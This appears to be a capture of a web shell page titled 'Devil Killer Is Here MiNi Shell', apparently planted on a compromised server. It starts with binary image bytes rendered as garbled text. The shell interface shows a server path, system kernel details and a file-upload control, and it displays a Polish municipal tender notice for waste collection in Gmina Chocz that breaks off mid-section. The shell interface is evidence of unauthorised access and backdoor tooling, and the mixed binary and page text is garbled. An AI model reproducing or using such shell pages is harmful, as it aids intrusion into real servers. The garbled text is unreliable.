JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20241203/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20241203/0063070801-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Wykonanie usługi polegającej na odbiorze i transporcie odpadów komunalnych zmieszanych oraz odpadów komunalnych selektywnie zbieranych z terenu Gminy Chocz od 01.01.2025 r. do 31.12.2025 r. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA CHOCZ</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 250855587</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Rynek 17</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Chocz</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">63-313</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">wielkopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL416 - Kaliski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">627415330</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">627415685</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">ug@chocz.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.chocz.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Wykonanie usługi polegającej na odbiorze i transporcie odpadów komunalnych zmieszanych oraz odpadów komunalnych selektywnie zbieranych z terenu Gminy Chocz od 01.01.2025 r. do 31.12.2025 r. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-775381c5-a23a-4146-b298-1c84091ba4f5</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00630708</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-12-03</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00034891/05/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.2 Odbiór i transport odpadów komunalnych z nieruchomości zamieszkałych i niezamieszkałych z terenu Gminy Chocz w 2025 roku</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-775381c5-a23a-4146-b298-1c84091ba4f5 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://ezamowienia.gov.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego musi posiadać konto podmiotu „Wykonawca” na Platformie e-Zamówienia.Szczegółowe informacje na temat zakładania kont podmiotów oraz zasady i warunki korzystania z Platformy e-Zamówienia określa Regulamin Platformy e-Zamówienia, dostępny na stronie internetowej https://ezamowienia.gov.pl orazinformacje zamieszczone w zakładce „Centrum Pomocy”.<br/>2. Przeglądanie i pobieranie publicznej treści dokumentacji postępowania nie wymaga posiadania konta na Platformie e-Zamówieniaani logowania.<br/>3. Możliwość korzystania w postępowaniu z „Formularzy do komunikacji” w pełnym zakresie wymaga posiadania konta „Wykonawcy” na Platformie e-Zamówienia oraz zalogowania się na Platformie e-Zamówienia. Do korzystania z „Formularzy do komunikacji” służących do zadawania pytań dotyczących treści dokumentów zamówienia wystarczające jest posiadanie tzw. konta uproszczonego na Platformie e-Zamówienia.<br/>4. Wszystkie wysłane i odebrane w postępowaniu przez Wykonawcę wiadomości widoczne są po zalogowaniu w podglądzie postępowania w zakładce „Komunikacja”.<br/>5. Maksymalny rozmiar plików przesyłanych za pośrednictwem „Formularzy do komunikacji” wynosi 250 MB (wielkość ta dotyczy<br/>plików przesyłanych jako załączniki do jednego formularza).<br/>6. Minimalne wymagania techniczne dotyczące sprzętu używanego w celu korzystania z usług Platformy e-Zamówienia oraz informacje dotyczące specyfikacji połączenia określa Regulamin Platformy e-Zamówienia.<br/>7. W przypadku problemów technicznych i awarii związanych z funkcjonowaniem Platformy e-Zamówienia użytkownicy mogąskorzystać ze wsparcia technicznego dostępnego pod numerem telefonu (32) 77 88 999 lub drogą elektroniczną poprzez formularz udostępniony na stronie internetowej https://ezamowienia.gov.pl w zakładce „Zgłoś problem”</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Administratorem danych osobowych obowiązanym do spełnienia obowiązku informacyjnego z art. 13 RODO będzie w szczególności:<br/>a) Zamawiający - względem osób fizycznych, od których dane osobowe bezpośrednio pozyskał.<br/>Dotyczy to w szczególności:<br/>- wykonawcy będącego osobą fizyczną,<br/>- wykonawcy będącego osobą fizyczną, prowadzącą jednoosobową działalność gospodarczą,<br/>- pełnomocnika wykonawcy będącego osobą fizyczną (np. dane osobowe zamieszczone w pełnomocnictwie),<br/>- członka organu zarządzającego wykonawcy, będącego osobą fizyczną (np. dane osobowe zamieszczone w informacji z KRK),<br/>- osoby fizycznej skierowanej do przygotowania i przeprowadzenia postępowania o udzielenie zamówienia publicznego;<br/>b) Wykonawca - względem osób fizycznych, od których dane osobowe bezpośrednio pozyskał.<br/>Dotyczy to w szczególności:<br/>- osoby fizycznej skierowanej do realizacji zamówienia,<br/>- podwykonawcy/podmiotu trzeciego będącego osobą fizyczną,<br/>- podwykonawcy/podmiotu trzeciego będącego osobą fizyczną, prowadzącą jednoosobową działalność gospodarczą,<br/>- pełnomocnika podwykonawcy/podmiotu trzeciego będącego osobą fizyczną (np. dane osobowe zamieszczone w pełnomocnictwie),<br/>- członka organu zarządzającego podwykonawcy/podmiotu trzeciego, będącego osobą fizyczną (np. dane osobowe zamieszczone w informacji z KRK);<br/>c) Podwykonawca/podmiot trzeci - względem osób fizycznych, od których dane osobowe bezpośrednio pozyskał. Dotyczy to w szczególności osoby fizycznej skierowanej do realizacji zamówienia.<br/>2) Zgodnie z art. 13 ust. 1 i 2 RODO, informuję, że:<br/>a) administratorem Pani/Pana danych osobowych jest Urząd Miejski Gminy Chocz <br/>z siedzibą w Choczu, ul. Rynek 17, 63-313 Chocz, tel. 62 7415 330, e-mail: ug@chocz.pl,<br/>b) jeśli ma Pani/Pan pytania dotyczące sposobu i zakresu przetwarzania Pani/Pana danych osobowych, a także przysługujących Pani/Panu praw, może się Pani/Pan skontaktować z Inspektorem Ochrony Danych Osobowych, email: ug@chocz.pl ,<br/>c) Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o udzielenie zamówienia publicznego o sygnaturze ZP.271.13.2024 prowadzonym w trybie podstawowym,<br/>d) Podstawą prawną przetwarzania Pani/Pana danych osobowych jest ustawa Pzp oraz jej przepisy wykonawcze oraz przepisy z nią powiązane,<br/>e) odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ustawy Pzp;<br/>f) Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 ustawy Pzp, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia,<br/>g) obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy Pzp;<br/>h) w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO;<br/>i) posiada Pani/Pan:<br/>- na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>- na podstawie art. 16 RODO prawo do sprostowania lub uzupełnienia Pani/Pana danych osobowych ;<br/>- na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO ;<br/>- prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>j) nie przysługuje Pani/Panu:<br/>- w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>- prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Obowiązek informacyjny określony przepisami RODO spoczywa także na wykonawcach, którzy pozyskują dane osobowe osób trzecich w celu przekazania ich zamawiającemu w ofertach. W związku z tym należy złożyć zamawiającemu stosowne oświadczenie (oświadczenie zawarte zostało w Formularzu oferty).<br/>W postępowaniu o udzielenie zamówienia zgłoszenie żądania ograniczenia przetwarzania, o którym mowa w art. 18 ust. 1 RODO, nie ogranicza przetwarzania danych osobowych do czasu zakończenia tego postępowania.<br/>W przypadku korzystania przez osobę, której dane osobowe są przetwarzane przez Zamawiającego, z uprawnienia, o którym mowa w art. 15 ust. 1-3 RODO, Zamawiający może żądać od osoby występującej z żądaniem wskazania dodatkowych informacji, mających na celu sprecyzowanie nazwy lub daty zakończonego postępowania o udzielenie zamówienia</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.271.13.2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zamówienie obejmuje wykonanie usługi polegającej na odbiorze i transporcie odpadów komunalnych zmieszanych oraz odpadów komunalnych selektywnie zbieranych z terenu Gminy Chocz do Wielkopolskie Centrum Recyklingu – Spółka z o.o. w Jarocinie; Witaszyczki, ul. Mariusza Małynicza 1, 63-200 Jarocin. <br/>2.	W ramach zamówienia wykonawca zobowiązany jest odebrać następujące rodzaje odpadów komunalnych:<br/>1)	bezpośrednio od właścicieli nieruchomości:<br/>a)	niesegregowane (zmieszane) odpady komunalne,<br/>b)	odpady zbierane w sposób selektywny z podziałem na:<br/>-	papier i tektura,<br/>-	szkło bezbarwne,<br/>-	szkło kolorowe,<br/>-	tworzywa sztuczne,<br/>-	metale,<br/>-	odpady opakowaniowe wielomateriałowe,<br/>-	bioodpady,<br/>-	zużyte opony,<br/>-	zużyty sprzęt elektryczny i elektroniczny,<br/>-	meble i inne odpady wielkogabarytowe,<br/>-	popiół;<br/>2)	odpady zgromadzone w punktach na terenie gminy:<br/>a)	odbiór przeterminowanych leków oraz odpadów nieklasyfikujących się do odpadów medycznych powstałych w gospodarstwie domowym w wyniku przyjmowania produktów leczniczych w formie iniekcji i prowadzenia monitoringu poziomu substancji we krwi w szczególności igły i strzykawki z terenu gminy Chocz (Apteka przy ul. Pleszewskiej 4 w Choczu) – odbiór poprzedzony telefonicznym zgłoszeniem,<br/>b)	zużytych baterii i akumulatorów (placówki oświatowe z terenu gminy Chocz oraz budynek Urzędu Miejskiego Gminy Chocz, ul. Rynek 17, 63-313 Chocz) – odbiór poprzedzony telefonicznym zgłoszeniem;<br/><br/>Szczegółowy opis przedmiotu zamówienia określa załącznik nr 4 do SWZ </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90500000-2 - Usługi związane z odpadami</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja od do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2025-01-01 do 2025-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze oferty Zamawiający kierował się będzie kryterium:<br/>a) cena 60 %<br/>b) termin płatności faktury 40 %<br/>2. Sposób oceny ofert.<br/>W toku badania i oceny ofert zamawiający może żądać od Wykonawców wyjaśnień dotyczących treści złożonych ofert oraz przedmiotowych środków dowodowych lub innych składanych dokumentów lub oświadczeń.<br/>Zamawiający poprawi w ofercie omyłki zgodnie z art. 223 ust. 2 i 3 ustawy PZP, niezwłocznie zawiadamiając o tym wykonawcę,<br/>którego oferta została poprawiona.<br/>Zamawiający odrzuci ofertę w przypadkach określonych w art. 226 ustawy PZP.<br/>Oferty odrzucone nie będą brały udziału w dalszej części niniejszego postępowania o udzielenie zamówienia publicznego.<br/>Pozostałe oferty oceniane będą punktowo.<br/>Maksymalna ilość punktów jaką może otrzymać oferta wynosi 100 pkt.<br/>Przyjmuje się, że 1% = 1pkt i tak zostanie przeliczona liczba punktów w przyjętych kryteriach.<br/>3. Kryterium CENA „C”<br/>Cmin<br/>C = ----------------- x 60<br/>Cx<br/>C - ilość punktów przyznanych danej ofercie w kryterium cena brutto.<br/>Cmin - minimalna cena brutto zaoferowana w przetargu.<br/>Cx - cena brutto badanej oferty.<br/>Maksymalna ilość punktów jaką może otrzymać oferta w kryterium cena wynosi 60 pkt.<br/>4. Kryterium TERMIN PŁATNOŚCI FAKTURY „T”<br/>Przyjmuje się, że punkty w kryterium termin płatności faktury będą przyznawane następująco:<br/>Termin płatności faktury Ilość punktów<br/>7 dni 0<br/>14 dni 20<br/>21 dni 30<br/>30 dni 40<br/>Maksymalna ilość punktów jaką może otrzymać oferta w kryterium termin płatności faktury wynosi 40 pkt.<br/>UWAGA! Wykonawca zobowiązany jest podać w formularzu ofertowym jeden ze wskazanych terminów płatności faktury. Jeżeli Wykonawca na druku formularza ofertowego nie określi terminu płatności faktury lub wpisze termin inny niż 7, 14, 21 i 30 dni będzie to ocenione na 0 pkt.<br/>Zamawiający informuje, że przypadku braku wskazania przez Wykonawcę w formularzu ofertowym terminu płatności faktury, Zamawiający przyjmie termin płatności 30 dni.<br/>5. Łączna ocena ofert dokonana zostanie według wzoru:<br/>W = C + T<br/>W – Wskaźnik oceny ofert<br/>C – ilość punktów przyznana ofercie w kryterium cena brutto<br/>G – ilość punktów przyznana ofercie w kryterium termin płatności faktury<br/>Obliczenia dokonane będą z dokładnością do dwóch miejsc po przecinku.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin płatności fakt</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy:<br/>a)	nie podlegają wykluczeniu;<br/>b)	spełniają warunki udziału w postępowaniu, które zostały określone przez Zamawiającego w ogłoszeniu o zamówieniu oraz w niniejszej Specyfikacji Warunków Zamówienia. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1)	W celu potwierdzenia spełniania warunków udziału w postępowaniu oraz braku podstaw do wykluczenia wykonawca złoży wymagane przez zamawiającego oświadczenia.<br/>2)	Wykonawca zobowiązany jest dołączyć do oferty Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu, w zakresie wskazanym przez Zamawiającego (wg wzoru stanowiącego załącznik nr 2 do SWZ).<br/>3)	Oświadczenie, o którym mowa w ppkt 2), składa się, pod rygorem nieważności, w formie elektronicznej (opatrzone kwalifikowanym podpisem elektronicznym) lub w postaci elektronicznej opatrzone podpisem zaufanym lub podpisem osobistym.<br/>4)	W przypadku wspólnego ubiegania się o zamówienie przez wykonawców, oświadczenie, o którym mowa w ppkt 2), składa każdy z wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu. <br/>5)	Wykonawca, w przypadku polegania na zdolnościach lub sytuacji podmiotów udostępniających zasoby, przedstawia, wraz z oświadczeniem, o którym mowa w ppkt 2), także oświadczenie podmiotu udostępniającego zasoby, potwierdzające brak podstaw wykluczenia tego podmiotu oraz odpowiednio spełnianie warunków udziału <br/>w postępowaniu, w zakresie, w jakim wykonawca powołuje się na jego zasoby <br/>(wg wzoru stanowiącego załącznik nr 3 do SWZ).<br/>6)	Wykonawca, którego oferta zostanie oceniona najwyżej, zostanie wezwany przez Zamawiającego do dostarczenia w wyznaczonym terminie, nie krótszym niż 5 dni następujących podmiotowych środków dowodowych potwierdzających spełnienie warunków udziału w postepowaniu:<br/>1)	W celu spełnienia potwierdzenia warunku udziału w postępowaniu, dotyczącego uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile nie wynika to z odrębnych przepisów, o którym mowa w Rozdziale 7 ust. 2 SWZ, Wykonawca winien przedłożyć:<br/>-	zaświadczenie o wpisie do rejestru działalności regulowanej prowadzonej przez Burmistrza Gminy Chocz zgodnie z art. 9b i 9c ustawy z dnia 13 września 1996 r. o utrzymaniu czystości i porządku w gminach oraz art. 43 ustawy z dnia 6 marca 2018 r. Prawo przedsiębiorców w zakresie kodów odpadów komunalnych objętych przedmiotem zamówienia.<br/>-	zaświadczenie o wpisie do prowadzonego przez Marszałka Województwa Wielkopolskiego rejestru podmiotów wprowadzających produkty, produkty <br/>w opakowaniach i gospodarujących odpadami (BDO, Dział VII), o którym mowa w art. 49 i następne ustawy z dnia 14 grudnia 2012 r. o odpadach i który to rejestr stanowi element Bazy Danych o produktach i opakowaniach oraz o gospodarce odpadami.<br/>Wykonawca, winien złożyć oświadczenie wraz z wykazem pojazdów samochodowych i urządzeń technicznych dostępnych wykonawcy usług w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami:<br/>- o dysponowaniu jednym pojazdem, przystosowanym do odbierania odpadów, spełniającym wymagania Rozporządzenia Ministra Środowiska z dnia 11 stycznia 2013 r. w sprawie szczegółowych wymagań w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości z możliwością wjazdu na drogi o szerokości do 3,0 m, z dopuszczalną masą całkowitą do 12 ton, szerokością zabudowy pojazdu nieprzekraczającą 2,5 m.<br/>- Wykaz usług (o treści zgodnej z załącznikiem nr 7) wykonanych w okresie ostatnich 3 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy:<br/>•	wykonał co najmniej jedną usługę (dla jednego zamawiającego) odbierania odpadów komunalnych zmieszanych w ilości co najmniej 300 Mg/rok oraz odpadów komunalnych gromadzonych selektywnie w ilości co najmniej 200 Mg/rok.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych 